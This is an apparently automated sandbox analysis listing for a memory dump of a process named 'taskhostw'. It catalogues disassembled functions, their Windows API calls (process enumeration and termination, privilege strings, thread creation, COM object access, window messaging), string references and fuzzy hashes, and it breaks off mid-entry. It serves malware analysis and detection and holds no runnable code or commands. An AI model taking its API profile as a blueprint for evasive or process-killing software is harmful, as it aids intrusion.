Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: aaa2549f1d07c17a7489c0386f9672964818127ce2a7cf54cd0944f098870418
Instruction ID: fe61a65b521ec14f5e20ea91f96f917238a686002155eacaf70579eba45120cb
Opcode Fuzzy Hash: aaa2549f1d07c17a7489c0386f9672964818127ce2a7cf54cd0944f098870418
Instruction Fuzzy Hash: 09413D35A042199FCF10DFA4D8489AEBBB9FF48314F008069E95AE7361DB31E945CBB1

Function 00D49251 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00CF7F41: _memmove.LIBCMT ref: 00CF7F82

Part of subcall function 00D4AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00D4AEC7

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00D492D6
GetDlgCtrlID.USER32 ref: 00D492E1
GetParent.USER32 ref: 00D492FD
SendMessageW.USER32(00000000,?,00000111,?), ref: 00D49300
GetDlgCtrlID.USER32 ref: 00D49309
GetParent.USER32(?), ref: 00D49325
SendMessageW.USER32(00000000,?,?,00000111), ref: 00D49328

Strings

ComboBox, xrefs: 00D4925E
ListBox, xrefs: 00D49293

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: e10a3e0def791de9e767ccea4641d8db2cd90e5d5198e6ad47e14aaf28e346dc
Instruction ID: a95aa7f76fec146e71ad2d7dbc2e08261b8d6d8310e5547fdbe70bba3903a1f2
Opcode Fuzzy Hash: e10a3e0def791de9e767ccea4641d8db2cd90e5d5198e6ad47e14aaf28e346dc
Instruction Fuzzy Hash: 1A21F470A40208BFCF04AFA5CC99DFEBB74EF45300F100125B561972E1DB755819DA30

Function 00D689C0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00D689EC
CoInitialize.OLE32(00000000), ref: 00D68A19
CoUninitialize.OLE32 ref: 00D68A23
GetRunningObjectTable.OLE32(00000000,?), ref: 00D68B23
SetErrorMode.KERNEL32(00000001,00000029), ref: 00D68C50
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00D82C0C), ref: 00D68C84
CoGetObject.OLE32(?,00000000,00D82C0C,?), ref: 00D68CA7
SetErrorMode.KERNEL32(00000000), ref: 00D68CBA
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00D68D3A
VariantClear.OLEAUT32(?), ref: 00D68D4A

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 5a30dbe2214e9b79b0800a4db7657151f085a8394f1cb764a67aed4dcf7057ad
Instruction ID: d11af497ebf564caf46b44c3de8c4a172b1c18a914edb07d8207c9997dd6cb9b
Opcode Fuzzy Hash: 5a30dbe2214e9b79b0800a4db7657151f085a8394f1cb764a67aed4dcf7057ad
Instruction Fuzzy Hash: 28C125B1208305AFC700DF68C88492BB7E9FF88748F044A5DF98A9B251DB71ED45DB62

Function 00D4A473 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32 ref: 00D4A782

Strings

NAME, xrefs: 00D4A5B4
INSTANCE, xrefs: 00D4A690
CLASSNN, xrefs: 00D4A524
REGEXPCLASS, xrefs: 00D4A547
CLASS, xrefs: 00D4A501
TEXT, xrefs: 00D4A6B9

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 0072cf13c24a80e692f9c5db4dc5cda5faffda8ede4a102d89735f97ffb569c4
Instruction ID: d7b1c4e3f590975d3aa5b98aea5ab8eb2c5a2e47a3f21fc7c8ad14220937a413
Opcode Fuzzy Hash: 0072cf13c24a80e692f9c5db4dc5cda5faffda8ede4a102d89735f97ffb569c4
Instruction Fuzzy Hash: 1091E970600505ABDB18EF68C4C1BEEFB75FF05304F188119E959A7281DF30A999DBB1

Function 00CF2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB,?,?,000000FF,?,000000FF), ref: 00CF2EAE

Part of subcall function 00CF1DB3: GetClientRect.USER32(?,?), ref: 00CF1DDC
Part of subcall function 00CF1DB3: GetWindowRect.USER32(?,?), ref: 00CF1E1D
Part of subcall function 00CF1DB3: ScreenToClient.USER32(?,?), ref: 00CF1E45

GetDC.USER32 ref: 00D2CEB2
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00D2CEC5
SelectObject.GDI32(00000000,00000000), ref: 00D2CED3
SelectObject.GDI32(00000000,00000000), ref: 00D2CEE8
ReleaseDC.USER32(?,00000000), ref: 00D2CEF0
MoveWindow.USER32(?,?,?,?,?,?), ref: 00D2CF7B

Strings

U, xrefs: 00D2CE50

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 54fb541a1ef719eaef3b2e32886e11ea946f8d3c684b5540b0332c5ae817fcd5
Instruction ID: 1cb4f9187258b60e320d8c59ddf814a293d9647007fc66265e6d3c83f406d3e3
Opcode Fuzzy Hash: 54fb541a1ef719eaef3b2e32886e11ea946f8d3c684b5540b0332c5ae817fcd5
Instruction Fuzzy Hash: CF71BD30501209DFCF218F64E980ABE7BB6FF58315F285269FE559A2A6D7308C80DB71

Function 00D68D5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00D7F910), ref: 00D68E3D
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00D7F910), ref: 00D68E71
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00D68FEB
SysFreeString.OLEAUT32(?), ref: 00D69015

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 33094fa992167309d16b34ab06d4bf867d29462d1062e17318866e9b686344bd
Instruction ID: d0a4e28158f10b197a33888e0878c3ba1a2f5bd01eb4b108598862cbcb347d82
Opcode Fuzzy Hash: 33094fa992167309d16b34ab06d4bf867d29462d1062e17318866e9b686344bd
Instruction Fuzzy Hash: 59F13971A00209EFCF14DF94C888EAEB7B9FF49314F248159F916AB251DB31AE45DB60

Function 00D54D68 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D546AF: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00D536DB,?), ref: 00D546CC

Part of subcall function 00D546AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00D536DB,?), ref: 00D546E5

Part of subcall function 00D54AD8: GetFileAttributesW.KERNEL32(?,00D5374F), ref: 00D54AD9

lstrcmpiW.KERNEL32(?,?), ref: 00D54DE7
_wcscmp.LIBCMT ref: 00D54E01
MoveFileW.KERNEL32 ref: 00D54E1C

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 14bb3e751ca931bd42ca3e66ac9ecfa6c37c7a52420ed3086c15cc0921c771c8
Instruction ID: 1bd5a117143bdbe554b9935219e81e289bbc52d471b67308198280f1e7e4ecae
Opcode Fuzzy Hash: 14bb3e751ca931bd42ca3e66ac9ecfa6c37c7a52420ed3086c15cc0921c771c8
Instruction Fuzzy Hash: A05153B24083859BCB64DB94D8819DFB3ECEF84315F04092EBA85D3151EE34A68C877A

Function 00D78677 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001), ref: 00D78731

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 4528522f7b626aefa5cb90591c7344f1c07481c4c59b5658aa1829d9d6ab6c24
Instruction ID: 9852930d22ab656958a5b7c2d3f161641390afff7b1f239ae0ef4a6f2c7ee7b7
Opcode Fuzzy Hash: 4528522f7b626aefa5cb90591c7344f1c07481c4c59b5658aa1829d9d6ab6c24
Instruction Fuzzy Hash: 5F51B470680304BEDB249B69DC8DBAD3B64EB05310F648515F61DD62E1EF71E980EB71

Function 00CF2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32 ref: 00D2C477
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00D2C499
LoadImageW.USER32 ref: 00D2C4B1
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00D2C4CF
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00D2C4F0
DestroyIcon.USER32(00000000), ref: 00D2C4FF
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00D2C51C
DestroyIcon.USER32(?), ref: 00D2C52B

Part of subcall function 00D7A4E1: DeleteObject.GDI32(00000000), ref: 00D7A51A

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 651c42ab7f5fe4004bf45d60dfea3952f668ced153138d4c26a8b7d38db15fd9
Instruction ID: 1580275ba9e14cab41bd0697bb87a2d3dd477bca0edd9c4e2bdfba680fbe8960
Opcode Fuzzy Hash: 651c42ab7f5fe4004bf45d60dfea3952f668ced153138d4c26a8b7d38db15fd9
Instruction Fuzzy Hash: 21516570610209EFDB20DF25EC45FBA3BA5EB58714F100628FA06D72A0D770ED81DB61

Function 00D48BE3 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00D48864,00000B00,?,?), ref: 00D48BEC
HeapAlloc.KERNEL32(00000000,?,00D48864,00000B00,?,?), ref: 00D48BF3
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00D48864,00000B00,?,?), ref: 00D48C08
GetCurrentProcess.KERNEL32(?,00000000,?,00D48864,00000B00,?,?), ref: 00D48C10
DuplicateHandle.KERNEL32 ref: 00D48C13
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00D48864,00000B00,?,?), ref: 00D48C23
GetCurrentProcess.KERNEL32(00D48864,00000000,?,00D48864,00000B00,?,?), ref: 00D48C2B
DuplicateHandle.KERNEL32 ref: 00D48C2E
CreateThread.KERNEL32(00000000,00000000,00D48C54,00000000,00000000,00000000), ref: 00D48C48

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 53588a33bca5cad5dbcc5ed4528b2295ac84942d801dce2878594090e9ef23bd
Instruction ID: a1bda8701af0b8befafe34265baa8e2aa16627b8aed1a218bb88304cb9041d35
Opcode Fuzzy Hash: 53588a33bca5cad5dbcc5ed4528b2295ac84942d801dce2878594090e9ef23bd
Instruction Fuzzy Hash: 6301BBB5240348FFE720ABA5DC4DF6B3BACEB89711F404421FA09DB2A1DA709844CB30

Function 00D69228 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D6927C
VariantInit.OLEAUT32(?), ref: 00D6934D
VariantInit.OLEAUT32(?), ref: 00D6944E
VariantClear.OLEAUT32(?), ref: 00D69458
VariantClear.OLEAUT32(?), ref: 00D694B5

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00D69431
Null Object assignment in FOR..IN loop, xrefs: 00D692DD, 00D6940B, 00D694C3

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 0da215f8ee6d1c2b7467e6be2cbc9ee123c9048e5507e17e405d4aca1ae88735
Instruction ID: 951ea939c4131253a7bddd3076b2bc21175bf556ba7197a72030fda958060fff
Opcode Fuzzy Hash: 0da215f8ee6d1c2b7467e6be2cbc9ee123c9048e5507e17e405d4aca1ae88735
Instruction Fuzzy Hash: 0F919E71A00219EFDF20DFA5C854FAEB7B8EF45710F148559F909AB280DB70A946CBB4

Function 00D52D8E Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D0FE06: _wcscpy.LIBCMT ref: 00D0FE29

_memset.LIBCMT ref: 00D52E7F
GetMenuItemInfoW.USER32 ref: 00D52EAE
SetMenuItemInfoW.USER32 ref: 00D52F61
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00D52F8F

Strings

#j, xrefs: 00D52E0E
0, xrefs: 00D52E6B
#j, xrefs: 00D52E07

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0$#j$#j
API String ID: 4152858687-2499692205
Opcode ID: 6fe81cee24e970de42ac01c339efcdee04571d627f9af879c9e4f62537316cae
Instruction ID: 2beae992cde2eff2881de826ab680fd7b3c59ebfeed354b8c7c5f7f8725b68e3
Opcode Fuzzy Hash: 6fe81cee24e970de42ac01c339efcdee04571d627f9af879c9e4f62537316cae
Instruction Fuzzy Hash: D2519E716083019EDB25AF29E84567BBBB4EF96351F080A2DFD95D21A0DB60C94C87B2

Function 00D76DB2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00D76E56
SendMessageW.USER32(?,00001036,00000000,?), ref: 00D76E6A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00D76E84
_wcscat.LIBCMT ref: 00D76EDF
SendMessageW.USER32(?,00001057,00000000,?), ref: 00D76EF6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00D76F24

Strings

SysListView32, xrefs: 00D76E28

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: b23f43936cabaeabc1f2311d3cead82c379a14d16c8a598162615180f79e43c5
Instruction ID: e47b115eb6e6151d4b4c28b69852c998c4744501d919fe67b3ad6c635b9efaa8
Opcode Fuzzy Hash: b23f43936cabaeabc1f2311d3cead82c379a14d16c8a598162615180f79e43c5
Instruction Fuzzy Hash: E9418074A00308AFDB219F64DC85BEEB7A8EF08750F14846AF549E7291E672DD848B70

Function 00D6EA47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00D53C99: CreateToolhelp32Snapshot.KERNEL32 ref: 00D53CBE
Part of subcall function 00D53C99: Process32FirstW.KERNEL32(00000000,?), ref: 00D53CCC
Part of subcall function 00D53C99: CloseHandle.KERNEL32(00000000), ref: 00D53D96

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D6EAB8
GetLastError.KERNEL32 ref: 00D6EACB
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D6EAFA
TerminateProcess.KERNEL32(00000000,00000000), ref: 00D6EB77
GetLastError.KERNEL32(00000000), ref: 00D6EB82
CloseHandle.KERNEL32(00000000), ref: 00D6EBB7

Strings

SeDebugPrivilege, xrefs: 00D6EAD6

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: ca6eb09ee6fd27d23dfbe59b6976e6f82ac37b29b98cf9ad23423fc1749a3acb
Instruction ID: bf7bb8fac1f6c18da84c689ab1b6d5e041e0f21be089e73b2a06f9baf1bce56c
Opcode Fuzzy Hash: ca6eb09ee6fd27d23dfbe59b6976e6f82ac37b29b98cf9ad23423fc1749a3acb
Instruction Fuzzy Hash: FD419A712002019FDB24EF28CC96F7EB7A1EF40314F188059F9469B2D2DBB5E844DBA6

Function 00D5302E Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32 ref: 00D530CD

Strings

warning, xrefs: 00D530B6
info, xrefs: 00D5306E
question, xrefs: 00D53086
stop, xrefs: 00D5309E
blank, xrefs: 00D5304F

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: f77f9b8c9c97f6fccf02dc5c2d7f27163d63fed50cb532d75342762aa1c01ca5
Instruction ID: 7748f23b0471e23dbf5935c647073d905bc37807cb4b0b7a6ee257d296cd53ca
Opcode Fuzzy Hash: f77f9b8c9c97f6fccf02dc5c2d7f27163d63fed50cb532d75342762aa1c01ca5
Instruction Fuzzy Hash: 4911D836608306BEDB245F5CDC42CAA779CDF093A1F14002AFD44961C1EEA19F4495B0

Function 02AE85FE Relevance: 12.3, APIs: 8, Instructions: 322COMMON

Download Yara Rule

APIs

Part of subcall function 02AE8408: __time64.LIBCMT ref: 02AE8412

Part of subcall function 02A84445: _fseek.LIBCMT ref: 02A8445D

__wsplitpath.LIBCMT ref: 02AE86DD

Part of subcall function 02AA366E: __wsplitpath_helper.LIBCMT ref: 02AA36AE

_wcscpy.LIBCMT ref: 02AE86F0
_wcscat.LIBCMT ref: 02AE8703
__wsplitpath.LIBCMT ref: 02AE8728
_wcscat.LIBCMT ref: 02AE873E
_wcscat.LIBCMT ref: 02AE8751

Part of subcall function 02AE844E: _memmove.LIBCMT ref: 02AE8487
Part of subcall function 02AE844E: _memmove.LIBCMT ref: 02AE8496

_wcscmp.LIBCMT ref: 02AE8698

Part of subcall function 02AE8BDD: _wcscmp.LIBCMT ref: 02AE8CCD
Part of subcall function 02AE8BDD: _wcscmp.LIBCMT ref: 02AE8CE0

_wcsncpy.LIBCMT ref: 02AE896E

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID: _wcscat_wcscmp$__wsplitpath_memmove$__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 2744720387-0
Opcode ID: 3f3dfb22d26f6a159bee78abb3726d03450e3d1cb18015426b1c2ca3c1fd6652
Instruction ID: 26e8398c2922645553abdd8ccf4d929187139c8c936744029c3d96747d3a1611
Opcode Fuzzy Hash: 3f3dfb22d26f6a159bee78abb3726d03450e3d1cb18015426b1c2ca3c1fd6652
Instruction Fuzzy Hash: 16C129B1D40229AFDF11DFA5CD84ADEBBB9EF58300F0040AAE609E7150DB349A45CF65

Function 00D54339 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

